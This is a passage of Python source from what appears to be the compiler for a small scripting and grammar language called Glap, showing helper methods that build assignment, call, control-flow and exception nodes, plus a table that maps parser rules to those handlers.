SetLocal(lhs.node.value(), ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetLocal,\n MacroNodeAtom(lhs.node.value()),\n rhs.value_expr()\n )\n else:\n o.node = SetLocal(lhs.node.value(), rhs.value_expr())\n elif lhs.kind in (cls.INDEX_EXPR, cls.MACRO_NODE_INDEX):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n 
context, loc\n )))\n o.node = MacroNode(\n SetItem, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetItem(\n lhs.node.operands[0], lhs.node.operands[1], ve\n )\n else:\n if inmacro:\n o.node = MacroNode(\n SetItem,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetItem(\n lhs.node.operands[0],\n lhs.node.operands[1],\n rhs.value_expr()\n )\n elif lhs.kind in (cls.ACCESS_EXPR, cls.MACRO_NODE_ACCESS):\n if inplaceop:\n if inmacro:\n ve = MacroNode(inplaceop, lhs.node, rhs.value_expr())\n ve.deferred.append(SetLocation(*make_location(\n context, loc\n )))\n o.node = MacroNode(\n SetMember, lhs.node.nodes[0], lhs.node.nodes[1], ve\n )\n else:\n ve = inplaceop(lhs.node, rhs.value_expr())\n ve.set_location(*make_location(context, loc))\n o.node = SetMember(lhs.node.module, lhs.node.member, ve)\n else:\n if inmacro:\n o.node = MacroNode(\n SetMember,\n lhs.node.nodes[0],\n lhs.node.nodes[1],\n rhs.value_expr()\n )\n else:\n o.node = SetMember(\n lhs.node.module, lhs.node.member, rhs.value_expr()\n )\n else:\n raise GlapSyntaxError(context,\n \"Left-hand side of assignment must be l-value\", loc\n )\n if inmacro:\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.node.set_location(*make_location(context, loc))\n o.code.extend(lhs.code)\n o.code.extend(rhs.code)\n o.code.append(o.node)\n o.vars.extend(rhs.vars)\n if lhs.kind in (cls.VARIABLE, cls.MACRO_VARIABLE):\n o.vars.insert(0, lhs.node.value())\n if inmacro:\n o.value_holder = MacroNode(\n GetLocal, MacroNodeAtom(lhs.node.value())\n )\n o.value_holder.deferred.append(SetLocation(*make_location(\n context, lhs.node.position()\n )))\n else:\n o.value_holder = GetLocal(lhs.node.value())\n o.value_holder.set_location(\n *make_location(context, lhs.node.position())\n )\n else:\n o.value_holder = lhs.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_call(cls, context, loc, f, fargs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, f)\n for x in fargs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_CALL\n o.node = MacroNode(\n Call, f.value_expr(), *[x.value_expr() for x in fargs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.CALL_EXPR\n o.node = Call(f.value_expr(), *[x.value_expr() for x in fargs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(f.code)\n o.vars.extend(f.vars)\n for x in fargs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_variable(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n o.node = var\n if context.actions.inmacro:\n o.kind = cls.MACRO_VARIABLE\n o.value_holder = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n o.value_holder.deferred.append(\n SetLocation(*make_location(context, var.position()))\n )\n else:\n o.kind = cls.VARIABLE\n o.value_holder = GetLocal(var.value())\n o.value_holder.set_location(\n *make_location(context, var.position())\n )\n return o\n #-def\n\n @classmethod\n def make_getvalue(cls, context, var):\n \"\"\"\n \"\"\"\n\n o = cls(context, var.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(GetLocal, MacroNodeAtom(var.value()))\n 
o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = GetLocal(var.value())\n o.node.set_location(*make_location(context, var.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_macroparam(cls, context, var):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n \"Macro parameter must be used only inside macro body\",\n var.position()\n )\n o = cls(context, var.position(), \"\")\n o.kind = cls.MACRO_PARAM\n o.node = MacroNodeParam(var.value())\n o.node.deferred.append(SetLocation(*make_location(\n context, var.position()\n )))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_expand(cls, context, loc, m, margs):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, m)\n for x in margs:\n cls.checknode(context, loc, x)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_EXPAND\n o.node = MacroNode(\n Expand, m.value_expr(), *[x.value_expr() for x in margs]\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.EXPAND\n o.node = Expand(m.value_expr(), *[x.value_expr() for x in margs])\n o.node.set_location(*make_location(context, loc))\n o.code.extend(m.code)\n o.vars.extend(m.vars)\n for x in margs:\n o.code.extend(x.code)\n o.vars.extend(x.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_literal(cls, context, t):\n \"\"\"\n \"\"\"\n\n o = cls(context, t.position(), \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_NODE_NULLARY\n o.node = MacroNode(Const, MacroNodeAtom(t.value(True)))\n o.node.deferred.append(SetLocation(*make_location(\n context, t.position()\n )))\n else:\n o.kind = cls.NULLARY_EXPR\n o.node = Const(t.value(True))\n o.node.set_location(*make_location(context, t.position()))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_pair(cls, context, loc, x, y):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, x)\n cls.checknode(context, loc, y)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_BINARY\n o.node = MacroNode(NewPair, x.value_expr(), y.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.BINARY_EXPR\n o.node = NewPair(x.value_expr(), y.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(x.code)\n o.code.extend(y.code)\n o.vars.extend(x.vars)\n o.vars.extend(y.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_list(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for i in items:\n cls.checknode(context, loc, i)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n o.node = MacroNode(NewList, *[i.value_expr() for i in items])\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewList(*[i.value_expr() for i in items])\n o.node.set_location(*make_location(context, loc))\n for i in items:\n o.code.extend(i.code)\n o.vars.extend(i.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_hash(cls, context, loc, items):\n \"\"\"\n \"\"\"\n\n for k, v in items:\n cls.checknode(context, loc, k)\n cls.checknode(context, loc, v)\n inmacro = context.actions.inmacro\n o = cls(context, 
loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_NODE_NARY\n items_ = []\n for k, v in items:\n p = MacroNode(NewPair, k.value_expr(), v.value_expr())\n p.deferred.append(k.value_expr().deferred[0])\n items_.append(p)\n o.node = MacroNode(NewHashMap, *items_)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.NARY_EXPR\n o.node = NewHashMap(*[\n (k.value_expr(), v.value_expr()) for k, v in items\n ])\n o.node.set_location(*make_location(context, loc))\n for k, v in items:\n o.code.extend(k.code)\n o.code.extend(v.code)\n o.vars.extend(k.vars)\n o.vars.extend(v.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_lambda(cls, context, loc, fargs, has_varargs, commands):\n \"\"\"\n \"\"\"\n\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n bvars = []\n for cmd in commands:\n body.extend(cmd.code)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n bvars.extend(cmd.vars)\n fargs_ = [x.value() for x in fargs]\n bvars_ = [x for x in bvars if x not in fargs_]\n if inmacro:\n o.kind = cls.MACRO_NODE_LAMBDA\n o.node = MacroNode(\n Lambda,\n MacroNodeAtom(fargs_),\n MacroNodeAtom(has_varargs),\n MacroNodeSequence(*body),\n MacroNodeAtom(bvars_)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.LAMBDA_EXPR\n o.node = Lambda(fargs_, has_varargs, body, bvars_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_block(cls, context, loc, commands, keep_varinfo = False):\n \"\"\"\n \"\"\"\n\n for cmd in commands:\n cls.checknode(context, loc, cmd)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n body = []\n for cmd in commands:\n body.extend(cmd.code)\n if keep_varinfo:\n o.vars.extend(cmd.vars)\n if cmd.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n body.append(cmd.value_expr())\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Block, *body)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Block(*body)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_defmacro(cls, context, loc, name, params, body):\n \"\"\"\n \"\"\"\n\n if not context.actions.inmacro:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is outside `defmacro'\"), loc\n )\n if context.actions.procedure_nesting_level != 0:\n raise GlapSyntaxError(context,\n ie_(\"Macro body is inside function\"), loc\n )\n for node in body:\n cls.checknode(context, loc, node)\n o = cls(context, loc, \"\")\n o.kind = cls.DEFMACRO_STATEMENT\n mbody = []\n for node in body:\n mbody.extend(node.code)\n if node.kind not in (cls.ASSIGN_EXPR, cls.MACRO_NODE_ASSIGN):\n mbody.append(node.value_expr())\n o.node = DefMacro(name.value(), [p.value() for p in params], mbody)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.inmacro = False\n return o\n #-def\n\n @classmethod\n def make_define(cls, context, loc, name, params, has_varargs, body):\n \"\"\"\n \"\"\"\n\n if context.actions.inmacro:\n raise 
GlapSyntaxError(context,\n ie_(\"Function definition is inside macro\"), loc\n )\n if context.actions.procedure_nesting_level <= 0:\n raise GlapSyntaxError(context,\n ie_(\"Unballanced `define's\"), loc\n )\n cls.checknode(context, loc, body)\n params_ = [p.value() for p in params]\n bvars_ = [v for v in body.vars if v not in params_]\n body_ = body.value_expr().commands\n o = cls(context, loc, \"\")\n o.kind = cls.DEFINE_STATEMENT\n o.node = Define(name.value(), bvars_, params_, has_varargs, body_)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n context.actions.procedure_nesting_level -= 1\n return o\n #-def\n\n @classmethod\n def make_if(cls, context, loc, cond, then_part, elif_parts, else_part):\n \"\"\"\n \"\"\"\n\n inmacro = context.actions.inmacro\n if_then_parts = [(loc, cond, then_part)]\n if_then_parts.extend(elif_parts)\n node = None\n vars = []\n while if_then_parts:\n l, c, t = if_then_parts.pop()\n if node is None:\n node = []\n if else_part:\n ll, else_node = else_part[0]\n cls.checknode(context, ll, else_node)\n if inmacro:\n node.extend(else_node.value_expr().nodes)\n else:\n node.extend(else_node.value_expr().commands)\n vars.extend(else_node.vars)\n # `node' is either [] or [commands] or [macro nodes]\n cls.checknode(context, l, c)\n cls.checknode(context, l, t)\n if inmacro:\n node = c.code + [MacroNode(\n If,\n c.value_expr(),\n MacroNodeSequence(*t.value_expr().nodes),\n MacroNodeSequence(*node)\n )]\n node[-1].deferred.append(SetLocation(*make_location(\n context, l\n )))\n else:\n node = c.code + [If(\n c.value_expr(),\n t.value_expr().commands,\n node\n )]\n node[-1].set_location(*make_location(context, l))\n vars_ = []\n vars_.extend(c.vars)\n vars_.extend(t.vars)\n vars_.extend(vars)\n vars = vars_\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n else:\n o.kind = cls.STATEMENT\n o.node = node[-1]\n o.code = node[:-1]\n o.vars = vars\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_foreach(cls, context, loc, var, ie, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ie)\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n Foreach,\n MacroNodeAtom(var.value()),\n ie.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Foreach(\n var.value(), ie.value_expr(), body.value_expr().commands\n )\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ie.code)\n o.vars.append(var.value())\n o.vars.extend(ie.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_while(cls, context, loc, cond, body):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n cls.checknode(context, loc, body)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n While,\n cond.value_expr(),\n MacroNodeSequence(*body.value_expr().nodes)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = While(\n cond.value_expr(), body.value_expr().commands\n )\n 
o.node.set_location(*make_location(context, loc))\n o.vars.extend(cond.vars)\n o.vars.extend(body.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_dowhile(cls, context, loc, body, cond):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, body)\n cls.checknode(context, loc, cond)\n if cond.code:\n raise GlapSyntaxError(\n context,\n ie_(\"More then one commands in while-condition expression\"),\n loc\n )\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(\n DoWhile,\n MacroNodeSequence(*body.value_expr().nodes),\n cond.value_expr()\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = DoWhile(\n body.value_expr().commands, cond.value_expr()\n )\n o.node.set_location(*make_location(context, loc))\n o.vars.extend(body.vars)\n o.vars.extend(cond.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_break(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Break)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Break()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_continue(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Continue)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Continue()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return(cls, context, loc):\n \"\"\"\n \"\"\"\n\n o = cls(context, loc, \"\")\n if context.actions.inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return)\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return()\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n return o\n #-def\n\n @classmethod\n def make_return_with_value(cls, context, loc, rv):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, rv)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n o.node = MacroNode(Return, rv.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n o.node = Return(rv.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(rv.code)\n o.vars.extend(rv.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_try(cls, context, loc, tryblock, catches, fnly):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, tryblock)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n b = tryblock.value_expr().nodes\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append(MacroNodeSequence(\n MacroNodeAtom(ee.value()),\n MacroNodeAtom(ev),\n MacroNodeSequence(*hh.value_expr().nodes)\n ))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n 
f.extend(ff.value_expr().nodes)\n o.vars.extend(ff.vars)\n o.node = MacroNode(\n TryCatchFinally,\n MacroNodeSequence(*b),\n MacroNodeSequence(*c),\n MacroNodeSequence(*f)\n )\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n b = tryblock.value_expr().commands\n o.vars.extend(tryblock.vars)\n c = []\n for ll, ee, ev, hh in catches:\n cls.checknode(context, ll, hh)\n if ev:\n ev = ev.value()\n o.vars.append(ev)\n c.append((ee.value(), ev, hh.value_expr().commands))\n o.vars.extend(hh.vars)\n f = []\n if fnly:\n ll, ff = fnly[0]\n cls.checknode(context, ll, ff)\n f.extend(ff.value_expr().commands)\n o.vars.extend(ff.vars)\n o.node = TryCatchFinally(b, c, f)\n o.node.set_location(*make_location(context, loc))\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n\n @classmethod\n def make_throw(cls, context, loc, ee, em):\n \"\"\"\n \"\"\"\n\n cls.checknode(context, loc, ee)\n if em:\n cls.checknode(context, loc, em)\n inmacro = context.actions.inmacro\n o = cls(context, loc, \"\")\n if inmacro:\n o.kind = cls.MACRO_STATEMENT\n if em:\n o.node = MacroNode(Throw, ee.value_expr(), em.value_expr())\n else:\n o.node = MacroNode(Rethrow, ee.value_expr())\n o.node.deferred.append(SetLocation(*make_location(context, loc)))\n else:\n o.kind = cls.STATEMENT\n if em:\n o.node = Throw(ee.value_expr(), em.value_expr())\n else:\n o.node = Rethrow(ee.value_expr())\n o.node.set_location(*make_location(context, loc))\n o.code.extend(ee.code)\n o.vars.extend(ee.vars)\n if em:\n o.code.extend(em.code)\n o.vars.extend(em.vars)\n o.value_holder = o.node\n o.remove_duplicated_vars()\n return o\n #-def\n#-class\n\nclass GlapParserActions(object):\n \"\"\"\n \"\"\"\n __slots__ = [ 'context', 'inmacro', 'procedure_nesting_level', 'actions' ]\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n\n context.actions = self\n self.context = context\n self.inmacro = False\n self.procedure_nesting_level = 0\n self.actions = {\n 'start': self.on_start,\n 'module': self.on_module,\n 'grammar': self.on_grammar,\n 'rule': self.on_rule,\n 'rule_rhs_expr(_|_)': self.on_rule_rhs_expr_alt,\n 'rule_rhs_expr(_-_)': self.on_rule_rhs_expr_sub,\n 'rule_rhs_expr(_ _)': self.on_rule_rhs_expr_cat,\n 'rule_rhs_expr(_*)': self.on_rule_rhs_expr_star,\n 'rule_rhs_expr(_+)': self.on_rule_rhs_expr_plus,\n 'rule_rhs_expr(_?)': self.on_rule_rhs_expr_opt,\n 'rule_rhs_expr(-_)': self.on_rule_rhs_expr_neg,\n 'rule_rhs_expr(~_)': self.on_rule_rhs_expr_inv,\n 'rule_rhs_expr(_\\'_)': self.on_rule_rhs_expr_label,\n 'rule_rhs_expr_atom(ID)': self.on_rule_rhs_expr_atom_var,\n 'rule_rhs_expr_atom(STR)': self.on_rule_rhs_expr_atom_str,\n 'rule_rhs_expr_atom(STR..STR)': self.on_rule_rhs_expr_atom_range,\n 'rule_rhs_expr_atom(eps)': self.on_rule_rhs_expr_atom_epsilon,\n 'rule_rhs_expr_atom(action)': self.on_rule_rhs_expr_atom_action,\n 'c_expr(_=_)': (lambda *args:\n GlapCompileCmdHelper.make_assign(*args)\n ),\n 'c_expr(_+=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Add)\n ),\n 'c_expr(_-=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Sub)\n ),\n 'c_expr(_*=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mul)\n ),\n 'c_expr(_/=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Div)\n ),\n 'c_expr(_%=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Mod)\n ),\n 'c_expr(_&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitAnd)\n ),\n 
'c_expr(_|=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitOr)\n ),\n 'c_expr(_^=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, ShiftR)\n ),\n 'c_expr(_&&=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, And)\n ),\n 'c_expr(_||=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Or)\n ),\n 'c_expr(_.=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Concat)\n ),\n 'c_expr(_++=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Join)\n ),\n 'c_expr(_~~=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_assign(c, l, x, y, Merge)\n ),\n 'c_expr(_||_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Or)\n ),\n 'c_expr(_&&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, And)\n ),\n 'c_expr(_<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Lt)\n ),\n 'c_expr(_>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Gt)\n ),\n 'c_expr(_<=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Le)\n ),\n 'c_expr(_>=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ge)\n ),\n 'c_expr(_==_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Eq)\n ),\n 'c_expr(_!=_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Ne)\n ),\n 'c_expr(_===_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Is)\n ),\n 'c_expr(_in_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Contains)\n ),\n 'c_expr(_|_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitOr)\n ),\n 'c_expr(_&_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitAnd)\n ),\n 'c_expr(_^_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, BitXor)\n ),\n 'c_expr(_<<_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftL)\n ),\n 'c_expr(_>>_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, ShiftR)\n ),\n 'c_expr(_+_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Add)\n ),\n 'c_expr(_-_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Sub)\n ),\n 'c_expr(_._)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Concat)\n ),\n 'c_expr(_++_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Join)\n ),\n 'c_expr(_~~_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Merge)\n ),\n 'c_expr(_*_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mul)\n ),\n 'c_expr(_/_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Div)\n ),\n 'c_expr(_%_)': (lambda c, l, x, y:\n GlapCompileCmdHelper.make_binary(c, l, x, y, Mod)\n ),\n 'c_expr(_ _)': (lambda *args:\n GlapCompileCmdHelper.make_call(*args)\n ),\n 'c_expr(-_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Neg)\n ),\n 'c_expr(!_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Not)\n ),\n 'c_expr(~_)': (lambda c, l, e:\n GlapCompileCmdHelper.make_unary(c, l, e, Inv)\n ),\n 'c_expr(_[_])': (lambda *args:\n GlapCompileCmdHelper.make_index(*args)\n ),\n 'c_expr(_:ID)': (lambda *args:\n 
GlapCompileCmdHelper.make_access(*args)\n ),\n 'c_expr_atom(ID)': (lambda *args:\n GlapCompileCmdHelper.make_variable(*args)\n ),\n 'c_expr_atom($ID)': (lambda *args:\n GlapCompileCmdHelper.make_getvalue(*args)\n ),\n 'c_expr_atom(#ID)': (lambda *args:\n GlapCompileCmdHelper.make_macroparam(*args)\n ),\n 'c_expr_atom($(_ _))': (lambda *args:\n GlapCompileCmdHelper.make_expand(*args)\n ),\n 'c_expr_atom(INT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(FLOAT)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(STR)': (lambda *args:\n GlapCompileCmdHelper.make_literal(*args)\n ),\n 'c_expr_atom(pair)': (lambda *args:\n GlapCompileCmdHelper.make_pair(*args)\n ),\n 'c_expr_atom(list)': (lambda *args:\n GlapCompileCmdHelper.make_list(*args)\n ),\n 'c_expr_atom(hash)': (lambda *args:\n GlapCompileCmdHelper.make_hash(*args)\n ),\n 'c_expr_atom(lambda)': (lambda *args:\n GlapCompileCmdHelper.make_lambda(*args)\n ),\n 'c_stmt(block)': (lambda *args:\n GlapCompileCmdHelper.make_block(*args)\n ),\n 'c_stmt(defmacro)': (lambda *args:\n GlapCompileCmdHelper.make_defmacro(*args)\n ),\n 'c_stmt(define)': (lambda *args:\n GlapCompileCmdHelper.make_define(*args)\n ),\n 'c_stmt(if)': (lambda *args:\n GlapCompileCmdHelper.make_if(*args)\n ),\n 'c_stmt(foreach)': (lambda *args:\n GlapCompileCmdHelper.make_foreach(*args)\n ),\n 'c_stmt(while)': (lambda *args:\n GlapCompileCmdHelper.make_while(*args)\n ),\n 'c_stmt(do-while)': (lambda *args:\n GlapCompileCmdHelper.make_dowhile(*args)\n ),\n 'c_stmt(break)': (lambda *args:\n GlapCompileCmdHelper.make_break(*args)\n ),\n 'c_stmt(continue)': (lambda *args:\n GlapCompileCmdHelper.make_continue(*args)\n ),\n 'c_stmt(return)': (lambda *args:\n GlapCompileCmdHelper.make_return(*args)\n ),\n 'c_stmt(return(expr))': (lambda *args:\n GlapCompileCmdHelper.make_return_with_value(*args)\n ),\n 'c_stmt(try)': (lambda *args:\n GlapCompileCmdHelper.make_try(*args)\n ),\n 'c_stmt(throw)': (lambda *args:\n GlapCompileCmdHelper.make_throw(*args)\n ),\n 'a_stmt(block)': (lambda *args: mn_(ABlock, *args)),\n 'a_stmt(expr)': (lambda ctx, loc, e: e),\n 'a_stmt(_=_)': (lambda *args: mn_(AAssign, *args)),\n 'a_stmt(_+=_)': (lambda *args: mn_(AInplaceAdd, *args)),\n 'a_stmt(_-=_)': (lambda *args: mn_(AInplaceSub, *args)),\n 'a_stmt(_*=_)': (lambda 